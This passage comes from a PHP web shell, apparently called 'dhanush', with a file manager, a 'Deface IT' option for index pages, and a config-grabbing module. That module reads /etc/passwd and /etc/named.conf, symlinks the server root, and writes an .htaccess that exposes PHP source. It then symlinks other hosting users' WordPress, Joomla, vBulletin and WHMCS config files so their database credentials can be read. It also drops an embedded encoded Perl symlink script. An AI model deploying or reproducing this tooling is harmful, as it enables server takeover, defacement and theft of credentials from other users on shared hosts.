1914 $name=@posix_getpwuid(@fileowner($value));
1915 $group=@posix_getgrgid(@filegroup($value));
1916 $owner = $name['name']. " / ". $group['name'];
1917 return $owner;
1918 }
1919}
1920if(!function_exists("scandir"))
1921{
1922 function scandir($dir) {
1923 $dh = opendir($dir);
1924 while (false !== ($filename = readdir($dh)))
1925 $files[] = $filename;
1926 return $files;
1927 }
1928}
1929function mainfun($dir)
1930{
1931 global $ind, $directorysperator,$os;
1932
1933 $mydir = basename(dirname(__FILE__));
1934 $pdir = str_replace($mydir,"",$dir);
1935 $pdir = str_replace("/","",$dir);
1936
1937 $files = array();
1938 $dirs = array();
1939
1940 $odir=opendir($dir);
1941 while($file = readdir($odir))
1942 {
1943 if(is_dir($dir.'/'.$file))
1944 {
1945 $dirs[]=$file;
1946 }
1947 else
1948 {
1949 $files[]=$file;
1950 }
1951 }
1952 $countfiles = count($dirs) + count($files);
1953 $dircount = count($dirs);
1954 $dircount = $dircount-2;
1955 $myfiles = array_merge($dirs,$files);
1956 $i = 0;
1957 if(is_dir($dir))
1958 {
1959 if(scandir($dir) === false)
1960 echo "<center><font size=3>Directory isn't readable</font></center>";
1961 else
1962 {
1963?><form method="post" id="myform" name="myform">
1964 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
1965 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
1966 <tr><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
1967 <tr height:12px;">
1968 <th>Name</th>
1969 <th>Size</th>
1970 <th>Permissions</th>
1971 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
1972 <th>Modification Date</th>
1973 <th>Rename</th>
1974 <th>Download</th>
1975 <th style="width:2%;">Action</th>
1976 </tr>
1977 <?php
1978 foreach($myfiles as $val)
1979 {
1980 $vv = addslashes($dir . $directorysperator . $val);
1981 $i++;
1982 if($val == ".")
1983 {
1984 ?><tr class=lines><td><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
1985 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
1986
1987 <?php if($os != 'Windows')
1988 {
1989 echo "<td align=center><font size=2>";
1990 echo getOGid($dir)."</font></td>";
1991 }
1992 ?>
1993
1994 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
1995 <td></td><td></td><td></td></</tr><?php
1996
1997 }
1998 else if($val == "..")
1999 {
2000 $val = Trail($dir . $directorysperator . $val,$directorysperator);
2001 $vv = addslashes($val);
2002 if(empty($vv))
2003 $vv = "/"; ?>
2004 <tr class=lines><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
2005 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
2006 <?php if($os != 'Windows')
2007 {
2008 echo "<td align=center><font size=2>";
2009 echo getOGid($val)."</font></td>";
2010
2011 } ?>
2012 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
2013 <td></td><td></td><td></td></tr><?php continue;
2014 }
2015 }
2016 foreach($myfiles as $val)
2017 {
2018 $vv = addslashes($dir . $directorysperator . $val);
2019 $i++;
2020
2021 if(is_dir($vv))
2022 {
2023 if($val == "." || $val == "..")
2024 continue; ?>
2025 <tr class=lines>
2026 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
2027 <td class='info'><font size=2>DIR</font></td>
2028
2029 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
2030 <?php if($os != 'Windows')
2031 {
2032 echo "<td align=center><font size=2>";
2033 echo getOGid($val)."</font></td>";
2034 } ?>
2035 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
2036 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
2037 <td></td>
2038 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
2039 </tr></font>
2040 <?php
2041 }
2042 else if(is_file($vv))
2043 {
2044 ?>
2045 <tr class=lines>
2046 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
2047
2048 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
2049
2050 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
2051
2052 <?php if($os != 'Windows')
2053 {
2054 echo "<td align=center><font size=2>";
2055 echo getOGid($val)."</font></td>";
2056 } ?>
2057 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
2058
2059 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
2060 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
2061 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
2062 </tr>
2063 <p>
2064 <?php
2065 }
2066 }
2067
2068 echo "</table>
2069<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
2070<select class=sbox name=choice style='width: 100px;'>
2071 <option value=delete>Delete</option>
2072 <option value=chmod>Change mode</option>
2073 if(class_exists('ZipArchive'))
2074 { <option value=compre>Compress</option>
2075 <option value=uncompre>Uncompress</option> }
2076 </select>
2077
2078 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
2079 }}
2080 else
2081 {
2082 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
2083 }
2084
2085}
2086if(isset($_REQUEST["script"]))
2087{
2088 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
2089 ?>
2090 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('scserver')"><font class=txt size="4">| Use Server |</font></a></td>
2091 <td><a href=javascript:void(0) onClick="getdata('scphp')"><font class=txt size="4">| Use PHP |</font></a></td>
2092 </tr></table></center>
2093 <?php
2094}
2095elseif(isset($_REQUEST["scserver"]))
2096{
2097 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('servermanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2098 <td><a href=javascript:void(0) onClick="getdata('serverscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2099 </tr></table></center><?php
2100}
2101else if(isset($_REQUEST['servermanuallyscript']))
2102{
2103 ?>
2104 <center>
2105 <form action="<?php echo $self; ?>" method="post">
2106 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2107 <input type="button" OnClick="manuallyscriptfn('serverscriptlocator',passwd.value)" value="Get Config" class="but">
2108 </form>
2109 </center>
2110 <?php
2111}
2112elseif(isset($_REQUEST['serverscriptlocator']))
2113{
2114 if($os != "Windows")
2115 {
2116 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2117 $path=explode('/',$url);
2118 $url =str_replace($path[count($path)-1],'',$url);
2119 if(isset($_REQUEST['passwd']))
2120 {
2121 $getetc = trim($_REQUEST['passwd']);
2122
2123 mkdir("dhanushSPT");
2124 chdir("dhanushSPT");
2125
2126 $myfile = fopen("test.txt","w");
2127
2128 fputs($myfile,$getetc);
2129 fclose($myfile);
2130 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Username</font></td><td align=center><font size=4 >Script</font></td></tr>";
2131 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2132 while(!feof($file))
2133 {
2134 $s = fgets($file);
2135 $matches = array();
2136 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2137 $matches = str_replace("home/","",$matches[1]);
2138 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2139 $headers=get_headers($hs_status);
2140 if(strpos($headers[0],'200') == true )
2141 $hs_script = "Wordpress";
2142 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2143 $headers=get_headers($hs_status);
2144 if(strpos($headers[0],'200') == true )
2145 $hs_script = "Wordpress";
2146 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2147 $headers=get_headers($hs_status);
2148 if(strpos($headers[0],'200') == true )
2149 $hs_script = "Joomla";
2150 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2151 $headers=get_headers($hs_status);
2152 if(strpos($headers[0],'200') == true )
2153 $hs_script = "Vbulletin";
2154 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2155 $headers=get_headers($hs_status);
2156 if(strpos($headers[0],'200') == true )
2157 $hs_script = "Vbulletin";
2158 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2159 $headers=get_headers($hs_status);
2160 if(strpos($headers[0],'200') == true )
2161 $hs_script = "Mybb";
2162 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2163 $headers=get_headers($hs_status);
2164 if(strpos($headers[0],'200') == true )
2165 $hs_script = "IPB";
2166 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2167 $headers=get_headers($hs_status);
2168 if(strpos($headers[0],'200') == true )
2169 $hs_script = "SMF";
2170 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2171 $headers=get_headers($hs_status);
2172 if(strpos($headers[0],'200') == true )
2173 $hs_script = "WHMCS";
2174 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2175 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2176 $dcount++;
2177 }
2178 echo "</table>";
2179 fclose($file);
2180 unlink("test.txt");
2181 }
2182 else
2183 {
2184 $d0mains = @file("/etc/named.conf");
2185 if($d0mains)
2186 {
2187 @mkdir("dhanush",0777);
2188 @chdir("dhanush");
2189 execmd("ln -s / root");
2190 $file3 = 'Options all
2191 DirectoryIndex Sux.html
2192 AddType text/plain .php
2193 AddHandler server-parsed .php
2194 AddType text/plain .html
2195
2196
2197
2198 AddHandler txt .html
2199 Require None
2200 Satisfy Any
2201 ';
2202 $fp3 = fopen('.htaccess','w');
2203 $fw3 = fwrite($fp3,$file3);
2204 @fclose($fp3);
2205 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Site</font></td><td align=center><font size=4 >Script</font></td></tr>";
2206 $dcount = 1;
2207 foreach($d0mains as $d0main)
2208 {
2209 if(eregi("zone",$d0main))
2210 {
2211 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2212 flush();
2213
2214 if(strlen(trim($domains[1][0])) > 2)
2215 {
2216 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2217 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/wp-config.php";
2218 $headers=get_headers($hs_status);
2219 if(strpos($headers[0],'200') == true )
2220 $hs_script = "Wordpress";
2221 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/blog/wp-config.php";
2222 $headers=get_headers($hs_status);
2223 if(strpos($headers[0],'200') == true )
2224 $hs_script = "Wordpress";
2225 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/configuration.php";
2226 $headers=get_headers($hs_status);
2227 if(strpos($headers[0],'200') == true )
2228 $hs_script = "Joomla";
2229 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/forum/includes/config.php";
2230 $headers=get_headers($hs_status);
2231 if(strpos($headers[0],'200') == true )
2232 $hs_script = "Vbulletin";
2233 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/core/includes/config.php";
2234 $headers=get_headers($hs_status);
2235 if(strpos($headers[0],'200') == true )
2236 $hs_script = "Vbulletin";
2237 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/inc/config.php";
2238 $headers=get_headers($hs_status);
2239 if(strpos($headers[0],'200') == true )
2240 $hs_script = "Mybb";
2241 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/conf_global.php";
2242 $headers=get_headers($hs_status);
2243 if(strpos($headers[0],'200') == true )
2244 $hs_script = "IPB";
2245 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/settings.php";
2246 $headers=get_headers($hs_status);
2247 if(strpos($headers[0],'200') == true )
2248 $hs_script = "SMF";
2249 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/submitticket.php";
2250 $headers=get_headers($hs_status);
2251 if(strpos($headers[0],'200') == true )
2252 $hs_script = "WHMCS";
2253 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td><a href=".$domains[1][0]." target='_blank'><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt><a href=".$hs_status." target=_blank>".$hs_user."</a></font></td></tr>"; flush();
2254
2255 $dcount++;
2256 }
2257 }
2258
2259 }
2260 echo "</table>";
2261 }
2262 else
2263 {
2264 $TEST=@file('/etc/passwd');
2265 if ($TEST)
2266 {
2267 @mkdir("dhanush",0777);
2268 @chdir("dhanush");
2269 execmd("ln -s / root");
2270 $file3 = 'Options all
2271 DirectoryIndex Sux.html
2272 AddType text/plain .php
2273 AddHandler server-parsed .php
2274 AddType text/plain .html
2275 AddHandler txt .html
2276 Require None
2277 Satisfy Any
2278 ';
2279 $fp3 = fopen('.htaccess','w');
2280 $fw3 = fwrite($fp3,$file3);
2281 @fclose($fp3);
2282
2283 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2284
2285 $dcount = 1;
2286 $file = fopen("/etc/passwd", "r");
2287 //Output a line of the file until the end is reached
2288 while(!feof($file))
2289 {
2290 $s = fgets($file);
2291 $matches = array();
2292 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2293 $matches = str_replace("home/","",$matches[1]);
2294 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2295 $headers=get_headers($hs_status);
2296 if(strpos($headers[0],'200') == true )
2297 $hs_script = "Wordpress";
2298 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2299 $headers=get_headers($hs_status);
2300 if(strpos($headers[0],'200') == true )
2301 $hs_script = "Wordpress";
2302 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2303 $headers=get_headers($hs_status);
2304 if(strpos($headers[0],'200') == true )
2305 $hs_script = "Joomla";
2306 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2307 $headers=get_headers($hs_status);
2308 if(strpos($headers[0],'200') == true )
2309 $hs_script = "Vbulletin";
2310 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2311 $headers=get_headers($hs_status);
2312 if(strpos($headers[0],'200') == true )
2313 $hs_script = "Vbulletin";
2314 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2315 $headers=get_headers($hs_status);
2316 if(strpos($headers[0],'200') == true )
2317 $hs_script = "Mybb";
2318 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2319 $headers=get_headers($hs_status);
2320 if(strpos($headers[0],'200') == true )
2321 $hs_script = "IPB";
2322 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2323 $headers=get_headers($hs_status);
2324 if(strpos($headers[0],'200') == true )
2325 $hs_script = "SMF";
2326 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2327 $headers=get_headers($hs_status);
2328 if(strpos($headers[0],'200') == true )
2329 $hs_script = "WHMCS";
2330 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2331 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2332 $dcount++;
2333 }
2334 fclose($file);
2335
2336 echo "</table>";
2337 }
2338 else
2339 {
2340 @mkdir("dhanush",0777);
2341 @chdir("dhanush");
2342 execmd("ln -s / root");
2343 $file3 = 'Options all
2344 DirectoryIndex Sux.html
2345 AddType text/plain .php
2346 AddHandler server-parsed .php
2347 AddType text/plain .html
2348 AddHandler txt .html
2349 Require None
2350 Satisfy Any
2351 ';
2352 $fp3 = fopen('.htaccess','w');
2353 $fw3 = fwrite($fp3,$file3);
2354 @fclose($fp3);
2355 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2356 $temp = "";
2357 $val1 = 0;
2358 $val2 = 1000;
2359 for(;$val1 <= $val2;$val1++)
2360 {
2361 $uid = @posix_getpwuid($val1);
2362 if ($uid)
2363 $temp .= join(':',$uid)."\n";
2364 }
2365 echo '<br/>';
2366 $temp = trim($temp);
2367
2368 $file5 = fopen("test.txt","w");
2369 fputs($file5,$temp);
2370 fclose($file5);
2371
2372 $dcount = 1;
2373 $file = fopen("test.txt", "r");
2374 while(!feof($file))
2375 {
2376 $s = fgets($file);
2377 $matches = array();
2378 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2379 $matches = str_replace("home/","",$matches[1]);
2380 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2381 $headers=get_headers($hs_status);
2382 if(strpos($headers[0],'200') == true )
2383 $hs_script = "Wordpress";
2384 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2385 $headers=get_headers($hs_status);
2386 if(strpos($headers[0],'200') == true )
2387 $hs_script = "Wordpress";
2388 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2389 $headers=get_headers($hs_status);
2390 if(strpos($headers[0],'200') == true )
2391 $hs_script = "Joomla";
2392 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2393 $headers=get_headers($hs_status);
2394 if(strpos($headers[0],'200') == true )
2395 $hs_script = "Vbulletin";
2396 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2397 $headers=get_headers($hs_status);
2398 if(strpos($headers[0],'200') == true )
2399 $hs_script = "Vbulletin";
2400 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2401 $headers=get_headers($hs_status);
2402 if(strpos($headers[0],'200') == true )
2403 $hs_script = "Mybb";
2404 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2405 $headers=get_headers($hs_status);
2406 if(strpos($headers[0],'200') == true )
2407 $hs_script = "IPB";
2408 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2409 $headers=get_headers($hs_status);
2410 if(strpos($headers[0],'200') == true )
2411 $hs_script = "SMF";
2412 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2413 $headers=get_headers($hs_status);
2414 if(strpos($headers[0],'200') == true )
2415 $hs_script = "WHMCS";
2416 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2417 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2418 $dcount++;
2419 }
2420 fclose($file);
2421 echo "</table>";
2422 unlink("test.txt");
2423 }
2424 }
2425 }
2426 }
2427 else
2428 echo "<center>Cannot Get Scripts</center>";
2429}
2430elseif(isset($_REQUEST["scphp"]))
2431{
2432 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('phpmanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2433 <td><a href=javascript:void(0) onClick="getdata('phpscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2434 </tr></table></center><?php
2435}
2436else if(isset($_REQUEST['phpmanuallyscript']))
2437{
2438 ?>
2439 <center>
2440 <form action="<?php echo $self; ?>" method="post">
2441 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2442 <input type="button" OnClick="manuallyscriptfn('phpscriptlocator',passwd.value)" value="Get Config" class="but">
2443 </form>
2444 </center>
2445 <?php
2446}
2447else if(isset($_REQUEST['phpscriptlocator']))
2448{
2449 if($os == "Linux")
2450 {
2451 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2452 $path=explode('/',$url);
2453 $url =str_replace($path[count($path)-1],'',$url);
2454 function syml($usern,$pdomain)
2455 {
2456 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2457 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2458 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2459 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2460 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2461 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
2462 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2463 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2464 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
2465 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2466 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2467 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2468 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2469 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2470 symlink('/home/'.$usern.'/public_html/bb-config.php',$pdomain.'~~boxbilling.txt');
2471 symlink('/home/'.$usern.'/public_html/billing/bb-config.php',$pdomain.'~~boxbilling.txt');
2472 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2473 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2474 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2475 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2476 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2477 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2478 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2479 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2480 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2481 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
2482 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
2483 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2484 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
2485 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
2486 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2487 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
2488 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2489 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2490 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2491 }
2492 if(isset($_REQUEST['passwd']))
2493 {
2494 $getetc = trim($_REQUEST['passwd']);
2495
2496 mkdir("dhanushSPT");
2497 chdir("dhanushSPT");
2498 $file3 = 'Options all
2499 DirectoryIndex Sux.html
2500 AddType text/plain .php
2501 AddHandler server-parsed .php
2502 AddType text/plain .html
2503 AddHandler txt .html
2504 Require None
2505 Satisfy Any
2506 ';
2507 $fp3 = fopen('.htaccess','w');
2508 $fw3 = fwrite($fp3,$file3);
2509 @fclose($fp3);
2510 $myfile = fopen("test.txt","w");
2511 fputs($myfile,$getetc);
2512 fclose($myfile);
2513
2514 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2515 while(!feof($file))
2516 {
2517 $s = fgets($file);
2518 $matches = array();
2519 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2520 $matches = str_replace("home/","",$matches[1]);
2521 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2522 continue;
2523 syml($matches,$matches);
2524 }
2525 fclose($file);
2526 unlink("test.txt");
2527 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2528 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2529
2530 }
2531 else
2532 {
2533 $d0mains = @file("/etc/named.conf");
2534 if($d0mains)
2535 {
2536 mkdir("dhanushST");
2537 chdir("dhanushST");
2538 $file3 = 'Options all
2539 DirectoryIndex Sux.html
2540 AddType text/plain .php
2541 AddHandler server-parsed .php
2542 AddType text/plain .html
2543 AddHandler txt .html
2544 Require None
2545 Satisfy Any
2546 ';
2547 $fp3 = fopen('.htaccess','w');
2548 $fw3 = fwrite($fp3,$file3);
2549 @fclose($fp3);
2550 foreach($d0mains as $d0main)
2551 {
2552 if(eregi("zone",$d0main))
2553 {
2554 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2555 flush();
2556
2557 if(strlen(trim($domains[1][0])) > 2)
2558 {
2559 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2560
2561 syml($user['name'],$domains[1][0]);
2562 }
2563 }
2564 }
2565 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2566 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2567 }
2568 else
2569 {
2570 mkdir("dhanushSPT");
2571 chdir("dhanushSPT");
2572 $file3 = 'Options all
2573 DirectoryIndex Sux.html
2574 AddType text/plain .php
2575 AddHandler server-parsed .php
2576 AddType text/plain .html
2577 AddHandler txt .html
2578 Require None
2579 Satisfy Any
2580 ';
2581 $fp3 = fopen('.htaccess','w');
2582 $fw3 = fwrite($fp3,$file3);
2583 @fclose($fp3);
2584 $temp = "";
2585 $val1 = 0;
2586 $val2 = 1000;
2587 for(;$val1 <= $val2;$val1++)
2588 {
2589 $uid = @posix_getpwuid($val1);
2590 if ($uid)
2591 $temp .= join(':',$uid)."\n";
2592 }
2593 echo '<br/>';
2594 $temp = trim($temp);
2595
2596 $file5 = fopen("test.txt","w");
2597 fputs($file5,$temp);
2598 fclose($file5);
2599
2600
2601 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2602 while(!feof($file))
2603 {
2604 $s = fgets($file);
2605 $matches = array();
2606 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2607 $matches = str_replace("home/","",$matches[1]);
2608 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2609 continue;
2610 syml($matches,$matches);
2611 }
2612 fclose($file);
2613 echo "</table>";
2614 unlink("test.txt");
2615 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2616 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2617 }
2618 }
2619 }
2620 else
2621 echo "<center>Cannot Complete the task!!!!</center>";
2622
2623}
2624else if(isset($_GET["perlsymlink"]))
2625{
2626 @mkdir("dhanush",0777);
2627 @chdir("dhanush");
2628 $dhanushsym = gzuncompress(base64_decode($plsym));
2629 $fp3 = fopen('dhanushsym.pl','w');
2630 $fw3 = fwrite($fp3,$dhanushsym);
2631 @fclose($fp3);
2632 chmod("dhanushsym.pl", 0755);
2633 ?><center><iframe src="dhanush/dhanushsym.pl" height="400" width="600"></iframe></center><?php
2634}
2635else if(isset($_GET["symlinkfile"]))
2636{
